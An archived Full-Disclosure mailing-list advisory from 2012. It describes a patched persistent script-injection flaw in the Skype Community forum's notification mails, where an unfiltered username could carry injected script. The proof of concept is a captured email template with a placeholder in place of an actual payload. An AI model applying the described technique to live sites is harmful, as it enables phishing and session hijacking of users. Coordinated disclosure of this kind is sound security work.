[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] Skype Community - Mail Encoding Web Vulnerability #2
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2012-11-26 18:04:35
Message-ID: 50B3AF33.4070508 () vulnerability-lab ! com
[Download RAW message or body]
Title:
======
Skype Community - Mail Encoding Web Vulnerability #2
Date:
=====
2012-11-21
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=719
VL-ID:
=====
719
Common Vulnerability Scoring System:
====================================
4
Introduction:
=============
Skype is a proprietary voice-over-Internet Protocol service and software application originally \
created in 2003 by Swedish entrepreneur Niklas Zennström and his Danish partner Janus Friis. \
It has been owned by Microsoft since 2011. The service allows users to communicate with peers \
by voice, video, and instant messaging over the Internet. Phone calls may be placed to \
recipients on the traditional telephone networks. Calls to other users within the Skype \
service are free of charge, while calls to landline telephones and mobile phones are charged \
via a debit-based user account system. Skype has also become popular for its additional \
features, including file transfer, and videoconferencing. Competitors include SIP and \
H.323-based services, such as Linphone, as well as the Google Talk service, Mumble and \
Hall.com.
Skype has 663 million registered users as of September 2011. The network is operated by \
Microsoft, which has its Skype division headquarters in Luxembourg. Most of the development \
team and 44% of the overall employees of the division are situated in Tallinn and Tartu, \
Estonia.
Unlike most other VoIP services, Skype is a hybrid peer-to-peer and client–server system. It \
makes use of background processing on computers running Skype software. Skype`s original \
proposed name (Sky Peer-to-Peer) reflects this fact. Some network administrators have banned \
Skype on corporate, government, home, and education networks, citing reasons such as \
inappropriate usage of resources, excessive bandwidth usage, and security concerns.
(Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Skype)
Abstract:
=========
The Vulnerability Laboratory Research Team discovered a filter & mail encoding vulnerability in \
the official Skype Community Website Application.
Report-Timeline:
================
2012-10-08: Researcher Notification & Coordination
2012-10-10: Vendor Notification
2012-10-12: Vendor Response/Feedback
2012-11-18: Vendor Fix/Patch
2012-11-21: Public or Non-Public Disclosure
Status:
========
Published
Affected Products:
==================
Microsoft
Product: Skype Community - Lithium Forums 2012 Q3
Exploitation-Technique:
=======================
Remote
Severity:
=========
High
Details:
========
A persistent input validation vulnerability is detected in the official Skype Community Website \
Application. The vulnerability is located in the update post form with the unsanitized username \
in send mails. Attackers can inject malicious persistent script code on application side of the \
skype skype community. The vulnerability is located in the filter function of the username when \
skype community is processing to send a not parsed update mail. Remote attacker with low \
privileged application user accounts can change the username values to malicious persistent \
script code via POST. The result in a persistent script code inject via noreply@skype.net. \
Successful exploitation of the vulnerability result in persistent phishing attacks, persistent \
session hijacking or mail context manipulation via persistent inject.
Vulnerable Section(s):
[+] Skype Community - (Forums)
Vulnerable Module(s):
[+] Notification Mail
Vulnerable Parameter(s):
[+] Username
Affected Section(s):
[+] Update Mail - Filter / Output Listing
Proof of Concept:
=================
The vulnerability can be exploited by remote attackers with low privileged application user \
account and with low or medium required user inter action. For demonstration or reproduce ...
<html>
<head>
<title>Skype Support Network Subscription: 1 Update: Betreff: Skype is Hacked ! \
Win32.Trojan.Agent.Gen schleicht sich durch die Accounts</title>
<link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css">
</head>
<body>
<table border=0 cellspacing=0 cellpadding=0 width="100%" \
class="header-part1"><tr><td><b>Betreff: </b>Skype Support Network Subscription: 1 Update: \
Betreff: Skype is Hacked ! Win32.Trojan.Agent.Gen schleicht sich durch die \
Accounts</td></tr><tr><td><b>Von: </b>Community Mailer \
<noreply@skype.net></td></tr><tr><td><b>Datum: </b>06.10.2012 16:04</td></tr></table><table \
border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part2"><tr> <td><b>An: \
</b>rm01x <admin@vulnerability-lab.com></td></tr></table><br> <html>
<head>
<title>
Skype Support Network Subscription: 1 Update: Betreff: Skype is Hacked !
Win32.Trojan.Agent.Gen schleicht sich durch die Accounts </title>
<style type="text/css">
body, td { font: 10pt Arial, Helvetica; }
</style>
</head>
<body class="lia-body email-template">
<div class="lia-content subscription subscription-digest">
<div class="email-header">
<h2 class="email-greeting">
Hello <[[PERSISTENT INJECTED SCRIPT CODE AS USERNAME!]]>,
</h2>
<p class="email-totals">
You have 1 update for your Skype Support Network Subscriptions.
</p>
</div><!-- end email-header -->
<div class="email-main email-subscriptions">
<hr />
<div class="email-subscription">
<h3>Subscription to Thema: <a \
href="http://community.skype.com/t5/Skype-f%C3%BCr-Windows/Skype-is-Hacked-Win32- \
Trojan-Agent-Gen-schleicht-sich-durch-die/td-p/1086370">Skype is Hacked ! \
Win32.Trojan.Agent.Gen schleicht sich durch die Accounts</a> (1 Update)</h3>
<div class="email-subscription-notifications">
<div class="email-subscription-notification">
There was a new Antworten.<br>
<table class="notification-metadata" border=0 cellspacing=0 cellpadding=2>
<tr><td>Subject: </td><td> <a \
href="http://community.skype.com/t5/Skype-f%C3%BCr-Windows/Skype-is-Hacked-Win32- \
Trojan-Agent-Gen-schleicht-sich-durch-die/m-p/1101468#M6531">Betreff: Skype is Hacked ! \
Win32.Trojan.Agent.Gen schleicht sich durch die Accounts</a></td></tr>
<tr><td>Author:</td><td>Methu (New Member)</td></tr>
<tr><td>Date:</td><td>06-10-2012 16:04</td></tr>
</table>
<p class="email-notification-body-separate">
<a href="http://community.skype.com/t5/Skype-f%C3%BCr-Windows/Skype-is-Hacked-Win32-Trojan-Agent-Gen-
schleicht-sich-durch-die/m-p/1101468#M6531">View</a>
</p>
</div><!-- end email-subscription-notification -->
</div><!-- end email-subscription-notifications -->
</div><!-- end email-subscription -->
</div><!-- end email-subscriptions -->
<hr />
<div class="email-footer">
<p class="manage-normal">
To manage your subscriptions or to change your subscription options,
click <a href="http://community.skype.com/skypec/user_subscriptions">here</a>.
</p>
<p class="manage-alternate">
If this link doesn't work:
<ol>
<li>Log on to Skype Support Network.</li>
<li>Click <b>My Profile</b>.</li>
<li>Click the <b>Subscriptions & Bookmarks</b> tab. </li>
<li>Change your settings and click <b>Save Changes</b>. </li>
</ol>
</p>
<p class="manage-thanks">Thanks for being a Skype Support Network member.</p>
<p class="manage-team">
<i>Your Skype Support Network Team</i>
</p>
<font size=-1>
<p class="manage-sent-to">
Skype Support Network sent this message to admin@vulnerability-lab.com.
</p>
<p class="manage-unsubscribe">
Did not request this email yourself? Click <a \
href="http://community.skype.com/t5/user/RemoveUserEmailPage/user-id \
/1915382/mail-message-tracking/H7YSNPPZVRU0CL">this link</a> to permanently prevent your email \
address being used on our community (NB: You won't be able to use the address yourself in the \
future).
</p>
</font>
</div><!-- end email-subscriptions-manage -->
</div><!-- end lithium-content -->
</body>
</html>
</body>
</html>
Solution:
=========
The vulnerability can be patched by parsing the context with the lithium api request of the \
community application formular.
Risk:
=====
The security risk of the filter & mail encoding vulnerability is estimated as \
medium(+)|(-)high.
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability-Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or \
its suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - \
www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - \
research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - \
news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, sourcecode, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use \
or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to \
get a permission.
Copyright © 2012 | Vulnerability Laboratory
--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@vulnerability-lab.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic